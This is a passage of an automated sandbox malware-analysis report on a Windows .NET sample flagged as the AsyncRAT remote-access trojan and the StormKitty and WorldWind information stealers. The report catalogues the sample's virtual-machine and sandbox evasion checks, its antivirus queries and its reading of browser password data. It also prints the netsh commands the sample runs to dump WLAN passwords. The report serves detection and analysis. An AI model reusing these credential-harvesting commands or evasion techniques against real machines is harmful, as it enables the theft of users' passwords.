                                  Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                                  Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                                  Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                                  Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                                  Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                                  Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                                  Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                                  Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                                  Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                                  Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                                  Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                                  Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                                  Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select ProcessorId From Win32_processor
                                  Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\1748642afea85b545bfef23bd04430d7Jump to behavior
                                  Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\tmp27E2.tmpJump to behavior
                                  Source: classification engineClassification label: mal100.rans.troj.spyw.evad.winEXE@17/129@5/4
                                  Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Pictures\desktop.iniJump to behavior
                                  Source: tmp2841.tmp.dat.0.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                                  Source: file.exe, Client/Helper/Methods.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
                                  Source: file.exe, Client/Helper/Methods.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
                                  Source: 0.0.file.exe.ee0000.0.unpack, Client/Helper/Methods.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
                                  Source: 0.0.file.exe.ee0000.0.unpack, Client/Helper/Methods.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
                                  Source: file.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                  Source: C:\Users\user\Desktop\file.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                                  Source: file.exe, Client/Settings.csBase64 encoded string: 'UkjGpQUwFoOCoPzB6MXcmJSBfKqbQ9j878lXFtrmhKsFUtYZ2uTRZT2szc9FnBnPh3wqJ4jmrkGc3GawPagQ5E9ZxE/sDr5imAl+YzoNodVDUZTiBczxVKYG61cYSyNZ', 'XK+EdSA5tK0jRtvK17IGrXmy/RaTow/RZQIIjQl4RECdyKto+0C9sOfHLwLaK/pziEz21AjCm9C5pcv1nngL6g==', 'UQLJJoRj3nyLwsy2KjJKnrH5OckV7jGbN8NtoWbphwbpFou5YzCwdFo146ZtPjkTY7nh3C9/Hjf0DMfiFk11Rg==', 'vtHJxl+VdtBxGWMrbtCU5ZRjrqH+C6vCZXELnorV1QkEXkJdt3q1YYl+J9G0r/GiG9kxFPSuC9qFVoCGAdwWVA==', 'i9AWzIWHXgJ4dLCcruM7xUfTXSc0XoSFneFXqcRj7NLzX2ZVYRzZCdTrTyX34SRL50bmBeG7osSgHcfGbfCadZoQYpMVX7ZRm4dolhnatx0=', 'r+/rXOpGCNKFu3Qao3m7a15p2NcRGdeTFburmla8LvPHUtLyo0ubtNlMAtPPxIVq5ryCFsF9oHNBkMr6djMLzA==', 'uUkG8BL0aacdJsigtFoM+k2dlhFaJeW8f/C6chx4PatrXDs8S1c0zb2S0natf78l2J15aiFf/qLcck+e8Zekeg=='
                                  Source: 0.0.file.exe.ee0000.0.unpack, Client/Settings.csBase64 encoded string: 'UkjGpQUwFoOCoPzB6MXcmJSBfKqbQ9j878lXFtrmhKsFUtYZ2uTRZT2szc9FnBnPh3wqJ4jmrkGc3GawPagQ5E9ZxE/sDr5imAl+YzoNodVDUZTiBczxVKYG61cYSyNZ', 'XK+EdSA5tK0jRtvK17IGrXmy/RaTow/RZQIIjQl4RECdyKto+0C9sOfHLwLaK/pziEz21AjCm9C5pcv1nngL6g==', 'UQLJJoRj3nyLwsy2KjJKnrH5OckV7jGbN8NtoWbphwbpFou5YzCwdFo146ZtPjkTY7nh3C9/Hjf0DMfiFk11Rg==', 'vtHJxl+VdtBxGWMrbtCU5ZRjrqH+C6vCZXELnorV1QkEXkJdt3q1YYl+J9G0r/GiG9kxFPSuC9qFVoCGAdwWVA==', 'i9AWzIWHXgJ4dLCcruM7xUfTXSc0XoSFneFXqcRj7NLzX2ZVYRzZCdTrTyX34SRL50bmBeG7osSgHcfGbfCadZoQYpMVX7ZRm4dolhnatx0=', 'r+/rXOpGCNKFu3Qao3m7a15p2NcRGdeTFburmla8LvPHUtLyo0ubtNlMAtPPxIVq5ryCFsF9oHNBkMr6djMLzA==', 'uUkG8BL0aacdJsigtFoM+k2dlhFaJeW8f/C6chx4PatrXDs8S1c0zb2S0natf78l2J15aiFf/qLcck+e8Zekeg=='
                                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5268:120:WilError_01
                                  Source: C:\Users\user\Desktop\file.exeMutant created: \Sessions\1\BaseNamedObjects\AsyncMutex_6SI8OkPnk
                                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7136:120:WilError_01
                                  Source: file.exeString found in binary or memory: \servers.dat-launcher_profiles.json/\launcher_profiles.json
                                  Source: C:\Users\user\Desktop\file.exeFile written: C:\Users\user\AppData\Local\1748642afea85b545bfef23bd04430d7\user@116938_en-US\Grabber\DRIVE-C\Users\user\Pictures\desktop.iniJump to behavior
                                  Source: file.exe, Client/Modules/Implant/StringsCrypt.csCryptographic APIs: 'CreateDecryptor'
                                  Source: file.exe, Client/Modules/StringsCrypt.csCryptographic APIs: 'CreateDecryptor'
                                  Source: 0.0.file.exe.ee0000.0.unpack, Client/Modules/StringsCrypt.csCryptographic APIs: 'CreateDecryptor'
                                  Source: 0.0.file.exe.ee0000.0.unpack, Client/Modules/Implant/StringsCrypt.csCryptographic APIs: 'CreateDecryptor'
                                  Source: C:\Users\user\Desktop\file.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                                  Source: C:\Users\user\Desktop\file.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                                  Source: C:\Users\user\Desktop\file.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                                  Source: C:\Users\user\Desktop\file.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                                  Source: C:\Users\user\Desktop\file.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                                  Source: C:\Users\user\Desktop\file.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                                  Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                                  Source: file.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                                  Data Obfuscation

                                  barindex
                                  .NET source code contains potential unpacker
                                  Source: file.exe, Client/Handle_Packet/Packet.cs.Net Code: Invoke System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
                                  Source: 0.0.file.exe.ee0000.0.unpack, Client/Handle_Packet/Packet.cs.Net Code: Invoke System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
                                  Source: file.exeStatic PE information: 0xBBAE67A1 [Sat Oct 12 02:06:25 2069 UTC]

                                  Boot Survival

                                  barindex
                                  Yara detected AsyncRAT
                                  Source: Yara matchFile source: file.exe, type: SAMPLE
                                  Source: Yara matchFile source: 0.0.file.exe.ee0000.0.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 00000000.00000000.472435711.0000000000EE2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                                  Source: Yara matchFile source: Process Memory Space: file.exe PID: 5740, type: MEMORYSTR
                                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                                  Malware Analysis System Evasion

                                  barindex
                                  Yara detected AsyncRAT
                                  Source: Yara matchFile source: file.exe, type: SAMPLE
                                  Source: Yara matchFile source: 0.0.file.exe.ee0000.0.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 00000000.00000000.472435711.0000000000EE2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                                  Source: Yara matchFile source: Process Memory Space: file.exe PID: 5740, type: MEMORYSTR
                                  Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                                  Source: file.exeBinary or memory string: SBIEDLL.DLL
                                  Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                                  Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                                  Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                                  Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                                  Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                                  Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                                  Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                                  Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
                                  Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                  Source: C:\Users\user\Desktop\file.exe TID: 6916Thread sleep time: -2767011611056431s >= -30000sJump to behavior
                                  Source: C:\Users\user\Desktop\file.exe TID: 6916Thread sleep time: -100000s >= -30000sJump to behavior
                                  Source: C:\Users\user\Desktop\file.exe TID: 6904Thread sleep count: 2775 > 30Jump to behavior
                                  Source: C:\Users\user\Desktop\file.exe TID: 6916Thread sleep time: -99860s >= -30000sJump to behavior
                                  Source: C:\Users\user\Desktop\file.exe TID: 6916Thread sleep time: -99703s >= -30000sJump to behavior
                                  Source: C:\Users\user\Desktop\file.exe TID: 6916Thread sleep time: -99594s >= -30000sJump to behavior
                                  Source: C:\Users\user\Desktop\file.exe TID: 6916Thread sleep time: -99484s >= -30000sJump to behavior
                                  Source: C:\Users\user\Desktop\file.exe TID: 6916Thread sleep time: -99371s >= -30000sJump to behavior
                                  Source: C:\Users\user\Desktop\file.exe TID: 6916Thread sleep time: -99266s >= -30000sJump to behavior
                                  Source: C:\Users\user\Desktop\file.exe TID: 6916Thread sleep time: -99156s >= -30000sJump to behavior
                                  Source: C:\Users\user\Desktop\file.exe TID: 6916Thread sleep time: -99950s >= -30000sJump to behavior
                                  Source: C:\Users\user\Desktop\file.exe TID: 6916Thread sleep time: -99844s >= -30000sJump to behavior
                                  Source: C:\Users\user\Desktop\file.exe TID: 6916Thread sleep time: -99734s >= -30000sJump to behavior
                                  Source: C:\Users\user\Desktop\file.exe TID: 5708Thread sleep time: -55000s >= -30000sJump to behavior
                                  Source: C:\Users\user\Desktop\file.exe TID: 6916Thread sleep time: -922337203685477s >= -30000sJump to behavior
                                  Source: C:\Users\user\Desktop\file.exeLast function: Thread delayed
                                  Source: C:\Users\user\Desktop\file.exeLast function: Thread delayed
                                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                  Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 922337203685477Jump to behavior
                                  Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 922337203685477Jump to behavior
                                  Source: C:\Users\user\Desktop\file.exeWindow / User API: threadDelayed 2775Jump to behavior
                                  Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                                  Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                                  Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                                  Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                                  Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                                  Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                                  Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select ProcessorId From Win32_processor
                                  Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * From Win32_ComputerSystem
                                  Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior
                                  Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 922337203685477Jump to behavior
                                  Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 100000Jump to behavior
                                  Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 99860Jump to behavior
                                  Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 99703Jump to behavior
                                  Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 99594Jump to behavior
                                  Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 99484Jump to behavior
                                  Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 99371Jump to behavior
                                  Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 99266Jump to behavior
                                  Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 99156Jump to behavior
                                  Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 99950Jump to behavior
                                  Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 99844Jump to behavior
                                  Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 99734Jump to behavior
                                  Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 922337203685477Jump to behavior
                                  Source: C:\Users\user\Desktop\file.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                  Source: file.exe, 00000000.00000003.537661851.0000000005F46000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware
                                  Source: file.exeBinary or memory string: vmware
                                  Source: file.exe, 00000000.00000003.531320130.0000000005808000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Win32_VideoController(Standard display types)VMware1X_6NRP3Win32_VideoControllerL_UETA9DVideoController120060621000000.000000-0001440163.display.infMSBDAF8HBZTSTPCI\VEN_15AD&DEV_0405&SUBSYS_040515AD&REV_00\3&61AAA01&0&78OKWin32_ComputerSystemcomputer1280 x 1024 x 4294967296 colorsL_8L9NDNq
                                  Source: file.exe, 00000000.00000003.531320130.0000000005808000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Win32_VideoController(Standard display types)VMware1X_6NRP3Win32_VideoControllerL_UETA9DVideoController120060621000000.000000-0001440163.display.infMSBDAF8HBZTSTPCI\VEN_15AD&DEV_0405&SUBSYS_040515AD&REV_00\3&61AAA01&0&78OKWin32_ComputerSystemcomputer1280 x 1024 x 4294967296 colorsL_8L9NDN
                                  Source: file.exe, 00000000.00000003.527831715.0000000005738000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.531682684.0000000005742000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.529572531.0000000005742000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.744913180.0000000005745000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll\P
                                  Source: file.exe, 00000000.00000003.537661851.0000000005F46000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Win32_VideoController(Standard display types)VMware1X_6NRP3Win32_VideoControllerL_UETA9DVideoController120060621000000.000000-0001440163.display.infMSBDAF8HBZTSTPCI\VEN_15AD&DEV_0405&SUBSYS_040515AD&REV_00\3&61AAA01&0&78OKWin32_ComputerSystemcomputer1280 x 1024 x 4294967296 colorsL_8L9NDNLMEMp
                                  Source: file.exeBinary or memory string: VMwareVBox
                                  Source: C:\Users\user\Desktop\file.exeProcess token adjusted: DebugJump to behavior
                                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_03297B98 LdrInitializeThunk,0_2_03297B98
                                  Source: C:\Users\user\Desktop\file.exeMemory allocated: page read and write | page guardJump to behavior
                                  Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr AllJump to behavior
                                  Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssidJump to behavior
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\chcp.com chcp 65001 Jump to behavior
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profile Jump to behavior
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr AllJump to behavior
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\chcp.com chcp 65001 Jump to behavior
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh wlan show networks mode=bssidJump to behavior

                                  Language, Device and Operating System Detection

                                  barindex
                                  Yara detected Telegram Recon
                                  Source: Yara matchFile source: file.exe, type: SAMPLE
                                  Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\Desktop\file.exe VolumeInformationJump to behavior
                                  Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\netsh.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\netsh.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\netsh.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\netsh.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                  Source: C:\Users\user\Desktop\file.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                                  Source: C:\Users\user\Desktop\file.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                                  Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion DigitalProductIdJump to behavior
                                  Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                                  Lowering of HIPS / PFW / Operating System Security Settings

                                  barindex
                                  Yara detected AsyncRAT
                                  Source: Yara matchFile source: file.exe, type: SAMPLE
                                  Source: Yara matchFile source: 0.0.file.exe.ee0000.0.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 00000000.00000000.472435711.0000000000EE2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                                  Source: Yara matchFile source: Process Memory Space: file.exe PID: 5740, type: MEMORYSTR
                                  Uses netsh to modify the Windows network and firewall settings
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profile
                                  Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                                  Source: file.exe, 00000000.00000003.527831715.0000000005738000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.537445553.0000000005DB1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.744993454.0000000005751000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.529572531.0000000005751000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.537910908.000000000574F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.531682684.0000000005753000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

                                  Stealing of Sensitive Information

                                  barindex
                                  Yara detected Telegram RAT
                                  Source: Yara matchFile source: file.exe, type: SAMPLE
                                  Source: Yara matchFile source: 0.0.file.exe.ee0000.0.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 00000000.00000000.472435711.0000000000EE2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000000.00000002.741988818.00000000032B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: Process Memory Space: file.exe PID: 5740, type: MEMORYSTR
                                  Yara detected StormKitty Stealer
                                  Source: Yara matchFile source: file.exe, type: SAMPLE
                                  Source: Yara matchFile source: 0.0.file.exe.ee0000.0.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 00000000.00000000.472435711.0000000000EE2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000000.00000002.741988818.00000000032B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: Process Memory Space: file.exe PID: 5740, type: MEMORYSTR
                                  Yara detected WorldWind Stealer
                                  Source: Yara matchFile source: file.exe, type: SAMPLE
                                  Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                                  Source: Yara matchFile source: 0.0.file.exe.ee0000.0.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 00000000.00000002.741988818.0000000003328000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000000.00000000.472435711.0000000000EE2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000000.00000002.741988818.00000000032B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: Process Memory Space: file.exe PID: 5740, type: MEMORYSTR
                                  Tries to harvest and steal WLAN passwords
                                  Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profile
